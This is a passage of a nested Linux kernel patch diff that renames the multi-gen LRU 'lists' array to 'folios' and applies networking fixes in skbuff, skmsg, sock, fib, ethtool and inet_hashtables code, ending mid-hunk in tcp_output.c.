+@@ -4258,7 +4258,7 @@ static bool inc_min_seq(struct lruvec *lruvec, int type, bool can_swap)
+ 
+ 	/* prevent cold/hot inversion if force_scan is true */
+ 	for (zone = 0; zone < MAX_NR_ZONES; zone++) {
+-		struct list_head *head = &lrugen->lists[old_gen][type][zone];
++		struct list_head *head = &lrugen->folios[old_gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			struct folio *folio = lru_to_folio(head);
+@@ -4269,7 +4269,7 @@ static bool inc_min_seq(struct lruvec *lruvec, int type, bool can_swap)
+ 			VM_WARN_ON_ONCE_FOLIO(folio_zonenum(folio) != zone, folio);
+ 
+ 			new_gen = folio_inc_gen(lruvec, folio, false);
+-			list_move_tail(&folio->lru, &lrugen->lists[new_gen][type][zone]);
++			list_move_tail(&folio->lru, &lrugen->folios[new_gen][type][zone]);
+ 
+ 			if (!--remaining)
+ 				return false;
+@@ -4297,7 +4297,7 @@ static bool try_to_inc_min_seq(struct lruvec *lruvec, bool can_swap)
+ 			gen = lru_gen_from_seq(min_seq[type]);
+ 
+ 			for (zone = 0; zone < MAX_NR_ZONES; zone++) {
+-				if (!list_empty(&lrugen->lists[gen][type][zone]))
++				if (!list_empty(&lrugen->folios[gen][type][zone]))
+ 					goto next;
+ 			}
+ 
+@@ -4331,6 +4331,7 @@ static void inc_max_seq(struct lruvec *lruvec, bool can_swap, bool force_scan)
+ 	int type, zone;
+ 	struct lru_gen_struct *lrugen = &lruvec->lrugen;
+ 
++restart:
+ 	spin_lock_irq(&lruvec->lru_lock);
+ 
+ 	VM_WARN_ON_ONCE(!seq_is_valid(lruvec));
+@@ -4341,11 +4342,12 @@ static void inc_max_seq(struct lruvec *lruvec, bool can_swap, bool force_scan)
+ 
+ 		VM_WARN_ON_ONCE(!force_scan && (type == LRU_GEN_FILE || can_swap));
+ 
+-		while (!inc_min_seq(lruvec, type, can_swap)) {
+-			spin_unlock_irq(&lruvec->lru_lock);
+-			cond_resched();
+-			spin_lock_irq(&lruvec->lru_lock);
+-		}
++		if (inc_min_seq(lruvec, type, can_swap))
++			continue;
++
++		spin_unlock_irq(&lruvec->lru_lock);
++		cond_resched();
++		goto restart;
+ 	}
+ 
+ 	/*
+@@ -4728,7 +4730,8 @@ void lru_gen_look_around(struct page_vma_mapped_walk *pvmw)
+  *                          the eviction
+  ******************************************************************************/
+ 
+-static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
++static bool sort_folio(struct lruvec *lruvec, struct folio *folio, struct scan_control *sc,
++		       int tier_idx)
+ {
+ 	bool success;
+ 	int gen = folio_lru_gen(folio);
+@@ -4762,7 +4765,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 
+ 	/* promoted */
+ 	if (gen != lru_gen_from_seq(lrugen->min_seq[type])) {
+-		list_move(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 		return true;
+ 	}
+ 
+@@ -4771,7 +4774,7 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 		int hist = lru_hist_from_seq(lrugen->min_seq[type]);
+ 
+ 		gen = folio_inc_gen(lruvec, folio, false);
+-		list_move_tail(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 
+ 		WRITE_ONCE(lrugen->protected[hist][type][tier - 1],
+ 			   lrugen->protected[hist][type][tier - 1] + delta);
+@@ -4779,11 +4782,18 @@ static bool sort_folio(struct lruvec *lruvec, struct folio *folio, int tier_idx)
+ 		return true;
+ 	}
+ 
++	/* ineligible */
++	if (zone > sc->reclaim_idx) {
++		gen = folio_inc_gen(lruvec, folio, false);
++		list_move_tail(&folio->lru, &lrugen->folios[gen][type][zone]);
++		return true;
++	}
++
+ 	/* waiting for writeback */
+ 	if (folio_test_locked(folio) || folio_test_writeback(folio) ||
+ 	    (type == LRU_GEN_FILE && folio_test_dirty(folio))) {
+ 		gen = folio_inc_gen(lruvec, folio, true);
+-		list_move(&folio->lru, &lrugen->lists[gen][type][zone]);
++		list_move(&folio->lru, &lrugen->folios[gen][type][zone]);
+ 		return true;
+ 	}
+ 
+@@ -4831,7 +4841,8 @@ static bool isolate_folio(struct lruvec *lruvec, struct folio *folio, struct sca
+ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 		       int type, int tier, struct list_head *list)
+ {
+-	int gen, zone;
++	int i;
++	int gen;
+ 	enum vm_event_item item;
+ 	int sorted = 0;
+ 	int scanned = 0;
+@@ -4847,10 +4858,11 @@ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 
+ 	gen = lru_gen_from_seq(lrugen->min_seq[type]);
+ 
+-	for (zone = sc->reclaim_idx; zone >= 0; zone--) {
++	for (i = MAX_NR_ZONES; i > 0; i--) {
+ 		LIST_HEAD(moved);
+ 		int skipped = 0;
+-		struct list_head *head = &lrugen->lists[gen][type][zone];
++		int zone = (sc->reclaim_idx + i) % MAX_NR_ZONES;
++		struct list_head *head = &lrugen->folios[gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			struct folio *folio = lru_to_folio(head);
+@@ -4863,7 +4875,7 @@ static int scan_folios(struct lruvec *lruvec, struct scan_control *sc,
+ 
+ 			scanned += delta;
+ 
+-			if (sort_folio(lruvec, folio, tier))
++			if (sort_folio(lruvec, folio, sc, tier))
+ 				sorted += delta;
+ 			else if (isolate_folio(lruvec, folio, sc)) {
+ 				list_add(&folio->lru, list);
+@@ -5250,7 +5262,7 @@ static bool __maybe_unused state_is_valid(struct lruvec *lruvec)
+ 		int gen, type, zone;
+ 
+ 		for_each_gen_type_zone(gen, type, zone) {
+-			if (!list_empty(&lrugen->lists[gen][type][zone]))
++			if (!list_empty(&lrugen->folios[gen][type][zone]))
+ 				return false;
+ 		}
+ 	}
+@@ -5295,7 +5307,7 @@ static bool drain_evictable(struct lruvec *lruvec)
+ 	int remaining = MAX_LRU_BATCH;
+ 
+ 	for_each_gen_type_zone(gen, type, zone) {
+-		struct list_head *head = &lruvec->lrugen.lists[gen][type][zone];
++		struct list_head *head = &lruvec->lrugen.folios[gen][type][zone];
+ 
+ 		while (!list_empty(head)) {
+ 			bool success;
+@@ -5832,7 +5844,7 @@ void lru_gen_init_lruvec(struct lruvec *lruvec)
+ 		lrugen->timestamps[i] = jiffies;
+ 
+ 	for_each_gen_type_zone(gen, type, zone)
+-		INIT_LIST_HEAD(&lrugen->lists[gen][type][zone]);
++		INIT_LIST_HEAD(&lrugen->folios[gen][type][zone]);
+ 
+ 	lruvec->mm_state.seq = MIN_NR_GENS;
+ 	init_waitqueue_head(&lruvec->mm_state.wait);
+diff --git a/net/core/flow_dissector.c b/net/core/flow_dissector.c
+index 007730412947d..3288490590f27 100644
+--- a/net/core/flow_dissector.c
++++ b/net/core/flow_dissector.c
+@@ -1738,8 +1738,7 @@ u32 __skb_get_hash_symmetric(const struct sk_buff *skb)
+ 
+ 	memset(&keys, 0, sizeof(keys));
+ 	__skb_flow_dissect(NULL, skb, &flow_keys_dissector_symmetric,
+-			   &keys, NULL, 0, 0, 0,
+-			   FLOW_DISSECTOR_F_STOP_AT_FLOW_LABEL);
++			   &keys, NULL, 0, 0, 0, 0);
+ 
+ 	return __flow_hash_from_keys(&keys, &hashrnd);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 24bf4aa222d27..8dca4a7ca4a1f 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -424,17 +424,26 @@ EXPORT_SYMBOL(napi_build_skb);
+  * may be used. Otherwise, the packet data may be discarded until enough
+  * memory is free
+  */
+-static void *kmalloc_reserve(size_t size, gfp_t flags, int node,
++static void *kmalloc_reserve(unsigned int *size, gfp_t flags, int node,
+ 			     bool *pfmemalloc)
+ {
+-	void *obj;
+ 	bool ret_pfmemalloc = false;
++	size_t obj_size;
++	void *obj;
++
++	obj_size = SKB_HEAD_ALIGN(*size);
++
++	obj_size = kmalloc_size_roundup(obj_size);
++	/* The following cast might truncate high-order bits of obj_size, this
++	 * is harmless because kmalloc(obj_size >= 2^32) will fail anyway.
++	 */
++	*size = (unsigned int)obj_size;
+ 
+ 	/*
+ 	 * Try a regular allocation, when that fails and we're not entitled
+ 	 * to the reserves, fail.
+ 	 */
+-	obj = kmalloc_node_track_caller(size,
++	obj = kmalloc_node_track_caller(obj_size,
+ 					flags | __GFP_NOMEMALLOC | __GFP_NOWARN,
+ 					node);
+ 	if (obj || !(gfp_pfmemalloc_allowed(flags)))
+@@ -442,7 +451,7 @@ static void *kmalloc_reserve(size_t size, gfp_t flags, int node,
+ 
+ 	/* Try again but now we are using pfmemalloc reserves */
+ 	ret_pfmemalloc = true;
+-	obj = kmalloc_node_track_caller(size, flags, node);
++	obj = kmalloc_node_track_caller(obj_size, flags, node);
+ 
+ out:
+ 	if (pfmemalloc)
+@@ -479,7 +488,6 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ {
+ 	struct kmem_cache *cache;
+ 	struct sk_buff *skb;
+-	unsigned int osize;
+ 	bool pfmemalloc;
+ 	u8 *data;
+ 
+@@ -504,18 +512,14 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 * aligned memory blocks, unless SLUB/SLAB debug is enabled.
+ 	 * Both skb->head and skb_shared_info are cache line aligned.
+ 	 */
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	osize = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(osize, gfp_mask, node, &pfmemalloc);
++	data = kmalloc_reserve(&size, gfp_mask, node, &pfmemalloc);
+ 	if (unlikely(!data))
+ 		goto nodata;
+ 	/* kmalloc_size_roundup() might give us more room than requested.
+ 	 * Put skb_shared_info exactly at the end of allocated zone,
+ 	 * to allow max possible filling before reallocation.
+ 	 */
+-	size = SKB_WITH_OVERHEAD(osize);
+-	prefetchw(data + size);
++	prefetchw(data + SKB_WITH_OVERHEAD(size));
+ 
+ 	/*
+ 	 * Only clear those fields we need to clear, not those that we will
+@@ -523,7 +527,7 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 * the tail pointer in struct sk_buff!
+ 	 */
+ 	memset(skb, 0, offsetof(struct sk_buff, tail));
+-	__build_skb_around(skb, data, osize);
++	__build_skb_around(skb, data, size);
+ 	skb->pfmemalloc = pfmemalloc;
+ 
+ 	if (flags & SKB_ALLOC_FCLONE) {
+@@ -578,8 +582,7 @@ struct sk_buff *__netdev_alloc_skb(struct net_device *dev, unsigned int len,
+ 		goto skb_success;
+ 	}
+ 
+-	len += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	len = SKB_DATA_ALIGN(len);
++	len = SKB_HEAD_ALIGN(len);
+ 
+ 	if (sk_memalloc_socks())
+ 		gfp_mask |= __GFP_MEMALLOC;
+@@ -678,8 +681,7 @@ struct sk_buff *__napi_alloc_skb(struct napi_struct *napi, unsigned int len,
+ 		data = page_frag_alloc_1k(&nc->page_small, gfp_mask);
+ 		pfmemalloc = NAPI_SMALL_PAGE_PFMEMALLOC(nc->page_small);
+ 	} else {
+-		len += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-		len = SKB_DATA_ALIGN(len);
++		len = SKB_HEAD_ALIGN(len);
+ 
+ 		data = page_frag_alloc(&nc->page, len, gfp_mask);
+ 		pfmemalloc = nc->page.pfmemalloc;
+@@ -1837,10 +1839,7 @@ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		goto nodata;
+ 	size = SKB_WITH_OVERHEAD(size);
+@@ -6204,10 +6203,7 @@ static int pskb_carve_inside_header(struct sk_buff *skb, const u32 off,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 	size = SKB_WITH_OVERHEAD(size);
+@@ -6323,10 +6319,7 @@ static int pskb_carve_inside_nonlinear(struct sk_buff *skb, const u32 off,
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+ 
+-	size = SKB_DATA_ALIGN(size);
+-	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	size = kmalloc_size_roundup(size);
+-	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
++	data = kmalloc_reserve(&size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 	size = SKB_WITH_OVERHEAD(size);
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 296e45b6c3c0d..a5c1f67dc96ec 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -611,12 +611,18 @@ static int sk_psock_skb_ingress_self(struct sk_psock *psock, struct sk_buff *skb
+ static int sk_psock_handle_skb(struct sk_psock *psock, struct sk_buff *skb,
+ 			       u32 off, u32 len, bool ingress)
+ {
++	int err = 0;
++
+ 	if (!ingress) {
+ 		if (!sock_writeable(psock->sk))
+ 			return -EAGAIN;
+ 		return skb_send_sock(psock->sk, skb, off, len);
+ 	}
+-	return sk_psock_skb_ingress(psock, skb, off, len);
++	skb_get(skb);
++	err = sk_psock_skb_ingress(psock, skb, off, len);
++	if (err < 0)
++		kfree_skb(skb);
++	return err;
+ }
+ 
+ static void sk_psock_skb_state(struct sk_psock *psock,
+@@ -684,9 +690,7 @@ static void sk_psock_backlog(struct work_struct *work)
+ 		} while (len);
+ 
+ 		skb = skb_dequeue(&psock->ingress_skb);
+-		if (!ingress) {
+-			kfree_skb(skb);
+-		}
++		kfree_skb(skb);
+ 	}
+ end:
+ 	mutex_unlock(&psock->work_mutex);
+diff --git a/net/core/sock.c b/net/core/sock.c
+index fc475845c94d5..e5858fa5d6d57 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -761,7 +761,8 @@ bool sk_mc_loop(struct sock *sk)
+ 		return false;
+ 	if (!sk)
+ 		return true;
+-	switch (sk->sk_family) {
++	/* IPV6_ADDRFORM can change sk->sk_family under us. */
++	switch (READ_ONCE(sk->sk_family)) {
+ 	case AF_INET:
+ 		return inet_sk(sk)->mc_loop;
+ #if IS_ENABLED(CONFIG_IPV6)
+@@ -1033,7 +1034,7 @@ static int sock_reserve_memory(struct sock *sk, int bytes)
+ 		mem_cgroup_uncharge_skmem(sk->sk_memcg, pages);
+ 		return -ENOMEM;
+ 	}
+-	sk->sk_forward_alloc += pages << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, pages << PAGE_SHIFT);
+ 
+ 	WRITE_ONCE(sk->sk_reserved_mem,
+ 		   sk->sk_reserved_mem + (pages << PAGE_SHIFT));
+@@ -2689,9 +2690,9 @@ static long sock_wait_for_wmem(struct sock *sk, long timeo)
+ 		prepare_to_wait(sk_sleep(sk), &wait, TASK_INTERRUPTIBLE);
+ 		if (refcount_read(&sk->sk_wmem_alloc) < READ_ONCE(sk->sk_sndbuf))
+ 			break;
+-		if (sk->sk_shutdown & SEND_SHUTDOWN)
++		if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 			break;
+-		if (sk->sk_err)
++		if (READ_ONCE(sk->sk_err))
+ 			break;
+ 		timeo = schedule_timeout(timeo);
+ 	}
+@@ -2719,7 +2720,7 @@ struct sk_buff *sock_alloc_send_pskb(struct sock *sk, unsigned long header_len,
+ 			goto failure;
+ 
+ 		err = -EPIPE;
+-		if (sk->sk_shutdown & SEND_SHUTDOWN)
++		if (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN)
+ 			goto failure;
+ 
+ 		if (sk_wmem_alloc_get(sk) < READ_ONCE(sk->sk_sndbuf))
+@@ -3081,10 +3082,10 @@ int __sk_mem_schedule(struct sock *sk, int size, int kind)
+ {
+ 	int ret, amt = sk_mem_pages(size);
+ 
+-	sk->sk_forward_alloc += amt << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, amt << PAGE_SHIFT);
+ 	ret = __sk_mem_raise_allocated(sk, size, amt, kind);
+ 	if (!ret)
+-		sk->sk_forward_alloc -= amt << PAGE_SHIFT;
++		sk_forward_alloc_add(sk, -(amt << PAGE_SHIFT));
+ 	return ret;
+ }
+ EXPORT_SYMBOL(__sk_mem_schedule);
+@@ -3116,7 +3117,7 @@ void __sk_mem_reduce_allocated(struct sock *sk, int amount)
+ void __sk_mem_reclaim(struct sock *sk, int amount)
+ {
+ 	amount >>= PAGE_SHIFT;
+-	sk->sk_forward_alloc -= amount << PAGE_SHIFT;
++	sk_forward_alloc_add(sk, -(amount << PAGE_SHIFT));
+ 	__sk_mem_reduce_allocated(sk, amount);
+ }
+ EXPORT_SYMBOL(__sk_mem_reclaim);
+@@ -3714,7 +3715,7 @@ void sk_get_meminfo(const struct sock *sk, u32 *mem)
+ 	mem[SK_MEMINFO_RCVBUF] = READ_ONCE(sk->sk_rcvbuf);
+ 	mem[SK_MEMINFO_WMEM_ALLOC] = sk_wmem_alloc_get(sk);
+ 	mem[SK_MEMINFO_SNDBUF] = READ_ONCE(sk->sk_sndbuf);
+-	mem[SK_MEMINFO_FWD_ALLOC] = sk->sk_forward_alloc;
++	mem[SK_MEMINFO_FWD_ALLOC] = sk_forward_alloc_get(sk);
+ 	mem[SK_MEMINFO_WMEM_QUEUED] = READ_ONCE(sk->sk_wmem_queued);
+ 	mem[SK_MEMINFO_OPTMEM] = atomic_read(&sk->sk_omem_alloc);
+ 	mem[SK_MEMINFO_BACKLOG] = READ_ONCE(sk->sk_backlog.len);
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 940c0e27be735..e31d1247b9f08 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -27,6 +27,7 @@
+ #include <linux/net.h>
+ #include <linux/pm_runtime.h>
+ #include <net/devlink.h>
++#include <net/ipv6.h>
+ #include <net/xdp_sock_drv.h>
+ #include <net/flow_offload.h>
+ #include <linux/ethtool_netlink.h>
+@@ -3090,7 +3091,6 @@ struct ethtool_rx_flow_rule *
+ ethtool_rx_flow_rule_create(const struct ethtool_rx_flow_spec_input *input)
+ {
+ 	const struct ethtool_rx_flow_spec *fs = input->fs;
+-	static struct in6_addr zero_addr = {};
+ 	struct ethtool_rx_flow_match *match;
+ 	struct ethtool_rx_flow_rule *flow;
+ 	struct flow_action_entry *act;
+@@ -3196,20 +3196,20 @@ ethtool_rx_flow_rule_create(const struct ethtool_rx_flow_spec_input *input)
+ 
+ 		v6_spec = &fs->h_u.tcp_ip6_spec;
+ 		v6_m_spec = &fs->m_u.tcp_ip6_spec;
+-		if (memcmp(v6_m_spec->ip6src, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6src)) {
+ 			memcpy(&match->key.ipv6.src, v6_spec->ip6src,
+ 			       sizeof(match->key.ipv6.src));
+ 			memcpy(&match->mask.ipv6.src, v6_m_spec->ip6src,
+ 			       sizeof(match->mask.ipv6.src));
+ 		}
+-		if (memcmp(v6_m_spec->ip6dst, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6dst)) {
+ 			memcpy(&match->key.ipv6.dst, v6_spec->ip6dst,
+ 			       sizeof(match->key.ipv6.dst));
+ 			memcpy(&match->mask.ipv6.dst, v6_m_spec->ip6dst,
+ 			       sizeof(match->mask.ipv6.dst));
+ 		}
+-		if (memcmp(v6_m_spec->ip6src, &zero_addr, sizeof(zero_addr)) ||
+-		    memcmp(v6_m_spec->ip6dst, &zero_addr, sizeof(zero_addr))) {
++		if (!ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6src) ||
++		    !ipv6_addr_any((struct in6_addr *)v6_m_spec->ip6dst)) {
+ 			match->dissector.used_keys |=
+ 				BIT(FLOW_DISSECTOR_KEY_IPV6_ADDRS);
+ 			match->dissector.offset[FLOW_DISSECTOR_KEY_IPV6_ADDRS] =
+diff --git a/net/hsr/hsr_forward.c b/net/hsr/hsr_forward.c
+index 629daacc96071..b71dab630a873 100644
+--- a/net/hsr/hsr_forward.c
++++ b/net/hsr/hsr_forward.c
+@@ -594,6 +594,7 @@ static int fill_frame_info(struct hsr_frame_info *frame,
+ 		proto = vlan_hdr->vlanhdr.h_vlan_encapsulated_proto;
+ 		/* FIXME: */
+ 		netdev_warn_once(skb->dev, "VLAN not yet supported");
++		return -EINVAL;
+ 	}
+ 
+ 	frame->is_from_san = false;
+diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
+index e8b9a9202fecd..35d6e74be8406 100644
+--- a/net/ipv4/devinet.c
++++ b/net/ipv4/devinet.c
+@@ -354,14 +354,14 @@ static void __inet_del_ifa(struct in_device *in_dev,
+ {
+ 	struct in_ifaddr *promote = NULL;
+ 	struct in_ifaddr *ifa, *ifa1;
+-	struct in_ifaddr *last_prim;
++	struct in_ifaddr __rcu **last_prim;
+ 	struct in_ifaddr *prev_prom = NULL;
+ 	int do_promote = IN_DEV_PROMOTE_SECONDARIES(in_dev);
+ 
+ 	ASSERT_RTNL();
+ 
+ 	ifa1 = rtnl_dereference(*ifap);
+-	last_prim = rtnl_dereference(in_dev->ifa_list);
++	last_prim = ifap;
+ 	if (in_dev->dead)
+ 		goto no_promotions;
+ 
+@@ -375,7 +375,7 @@ static void __inet_del_ifa(struct in_device *in_dev,
+ 		while ((ifa = rtnl_dereference(*ifap1)) != NULL) {
+ 			if (!(ifa->ifa_flags & IFA_F_SECONDARY) &&
+ 			    ifa1->ifa_scope <= ifa->ifa_scope)
+-				last_prim = ifa;
++				last_prim = &ifa->ifa_next;
+ 
+ 			if (!(ifa->ifa_flags & IFA_F_SECONDARY) ||
+ 			    ifa1->ifa_mask != ifa->ifa_mask ||
+@@ -439,9 +439,9 @@ no_promotions:
+ 
+ 			rcu_assign_pointer(prev_prom->ifa_next, next_sec);
+ 
+-			last_sec = rtnl_dereference(last_prim->ifa_next);
++			last_sec = rtnl_dereference(*last_prim);
+ 			rcu_assign_pointer(promote->ifa_next, last_sec);
+-			rcu_assign_pointer(last_prim->ifa_next, promote);
++			rcu_assign_pointer(*last_prim, promote);
+ 		}
+ 
+ 		promote->ifa_flags &= ~IFA_F_SECONDARY;
+diff --git a/net/ipv4/fib_semantics.c b/net/ipv4/fib_semantics.c
+index 3bb890a40ed73..3b6e6bc80dc1c 100644
+--- a/net/ipv4/fib_semantics.c
++++ b/net/ipv4/fib_semantics.c
+@@ -278,7 +278,8 @@ void fib_release_info(struct fib_info *fi)
+ 				hlist_del(&nexthop_nh->nh_hash);
+ 			} endfor_nexthops(fi)
+ 		}
+-		fi->fib_dead = 1;
++		/* Paired with READ_ONCE() from fib_table_lookup() */
++		WRITE_ONCE(fi->fib_dead, 1);
+ 		fib_info_put(fi);
+ 	}
+ 	spin_unlock_bh(&fib_info_lock);
+@@ -1581,6 +1582,7 @@ struct fib_info *fib_create_info(struct fib_config *cfg,
+ link_it:
+ 	ofi = fib_find_info(fi);
+ 	if (ofi) {
++		/* fib_table_lookup() should not see @fi yet. */
+ 		fi->fib_dead = 1;
+ 		free_fib_info(fi);
+ 		refcount_inc(&ofi->fib_treeref);
+@@ -1619,6 +1621,7 @@ err_inval:
+ 
+ failure:
+ 	if (fi) {
++		/* fib_table_lookup() should not see @fi yet. */
+ 		fi->fib_dead = 1;
+ 		free_fib_info(fi);
+ 	}
+diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c
+index 74d403dbd2b4e..d13fb9e76b971 100644
+--- a/net/ipv4/fib_trie.c
++++ b/net/ipv4/fib_trie.c
+@@ -1582,7 +1582,8 @@ found:
+ 		if (fa->fa_dscp &&
+ 		    inet_dscp_to_dsfield(fa->fa_dscp) != flp->flowi4_tos)
+ 			continue;
+-		if (fi->fib_dead)
++		/* Paired with WRITE_ONCE() in fib_release_info() */
++		if (READ_ONCE(fi->fib_dead))
+ 			continue;
+ 		if (fa->fa_info->fib_scope < flp->flowi4_scope)
+ 			continue;
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index c19b462662ad0..d79de4b95186b 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -795,43 +795,45 @@ static bool inet_bind2_bucket_match(const struct inet_bind2_bucket *tb,
+ 				    const struct net *net, unsigned short port,
+ 				    int l3mdev, const struct sock *sk)
+ {
++	if (!net_eq(ib2_net(tb), net) || tb->port != port ||
++	    tb->l3mdev != l3mdev)
++		return false;
++
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family != tb->family)
++	if (sk->sk_family != tb->family) {
++		if (sk->sk_family == AF_INET)
++			return ipv6_addr_v4mapped(&tb->v6_rcv_saddr) &&
++				tb->v6_rcv_saddr.s6_addr32[3] == sk->sk_rcv_saddr;
++
+ 		return false;
++	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev &&
+-			ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+-	else
++		return ipv6_addr_equal(&tb->v6_rcv_saddr, &sk->sk_v6_rcv_saddr);
+ #endif
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev && tb->rcv_saddr == sk->sk_rcv_saddr;
++	return tb->rcv_saddr == sk->sk_rcv_saddr;
+ }
+ 
+ bool inet_bind2_bucket_match_addr_any(const struct inet_bind2_bucket *tb, const struct net *net,
+ 				      unsigned short port, int l3mdev, const struct sock *sk)
+ {
+-#if IS_ENABLED(CONFIG_IPV6)
+-	struct in6_addr addr_any = {};
++	if (!net_eq(ib2_net(tb), net) || tb->port != port ||
++	    tb->l3mdev != l3mdev)
++		return false;
+ 
++#if IS_ENABLED(CONFIG_IPV6)
+ 	if (sk->sk_family != tb->family) {
+ 		if (sk->sk_family == AF_INET)
+-			return net_eq(ib2_net(tb), net) && tb->port == port &&
+-				tb->l3mdev == l3mdev &&
+-				ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
++			return ipv6_addr_any(&tb->v6_rcv_saddr) ||
++				ipv6_addr_v4mapped_any(&tb->v6_rcv_saddr);
+ 
+ 		return false;
+ 	}
+ 
+ 	if (sk->sk_family == AF_INET6)
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev &&
+-			ipv6_addr_equal(&tb->v6_rcv_saddr, &addr_any);
+-	else
++		return ipv6_addr_any(&tb->v6_rcv_saddr);
+ #endif
+-		return net_eq(ib2_net(tb), net) && tb->port == port &&
+-			tb->l3mdev == l3mdev && tb->rcv_saddr == 0;
++	return tb->rcv_saddr == 0;
+ }
+ 
+ /* The socket's bhash2 hashbucket spinlock must be held when this is called */
+@@ -853,11 +855,10 @@ inet_bhash2_addr_any_hashbucket(const struct sock *sk, const struct net *net, in
+ {
+ 	struct inet_hashinfo *hinfo = tcp_or_dccp_get_hashinfo(sk);
+ 	u32 hash;
+-#if IS_ENABLED(CONFIG_IPV6)
+-	struct in6_addr addr_any = {};
+ 
++#if IS_ENABLED(CONFIG_IPV6)
+ 	if (sk->sk_family == AF_INET6)
+-		hash = ipv6_portaddr_hash(net, &addr_any, port);
++		hash = ipv6_portaddr_hash(net, &in6addr_any, port);
+ 	else
+ #endif
+ 		hash = ipv4_portaddr_hash(net, 0, port);
+diff --git a/net/ipv4/ip_input.c b/net/ipv4/ip_input.c
+index e880ce77322aa..e7196ecffafc6 100644
+--- a/net/ipv4/ip_input.c
++++ b/net/ipv4/ip_input.c
+@@ -584,7 +584,8 @@ static void ip_sublist_rcv_finish(struct list_head *head)
+ static struct sk_buff *ip_extract_route_hint(const struct net *net,
+ 					     struct sk_buff *skb, int rt_type)
+ {
+-	if (fib4_has_custom_rules(net) || rt_type == RTN_BROADCAST)
++	if (fib4_has_custom_rules(net) || rt_type == RTN_BROADCAST ||
++	    IPCB(skb)->flags & IPSKB_MULTIPATH)
+ 		return NULL;
+ 
+ 	return skb;
+diff --git a/net/ipv4/route.c b/net/ipv4/route.c
+index 51bd9a50a1d1d..a04ffc128e22b 100644
+--- a/net/ipv4/route.c
++++ b/net/ipv4/route.c
+@@ -2146,6 +2146,7 @@ static int ip_mkroute_input(struct sk_buff *skb,
+ 		int h = fib_multipath_hash(res->fi->fib_net, NULL, skb, hkeys);
+ 
+ 		fib_select_multipath(res, h);
++		IPCB(skb)->flags |= IPSKB_MULTIPATH;
+ 	}
+ #endif
+ 
+diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c
+index 26bd039f9296f..dc3166e56169f 100644
+--- a/net/ipv4/tcp_output.c
++++ b/net/ipv4/tcp_output.c
+@@ -3380,7 +3380,7 @@ void sk_forced_mem_schedule(struct sock *sk, int size)
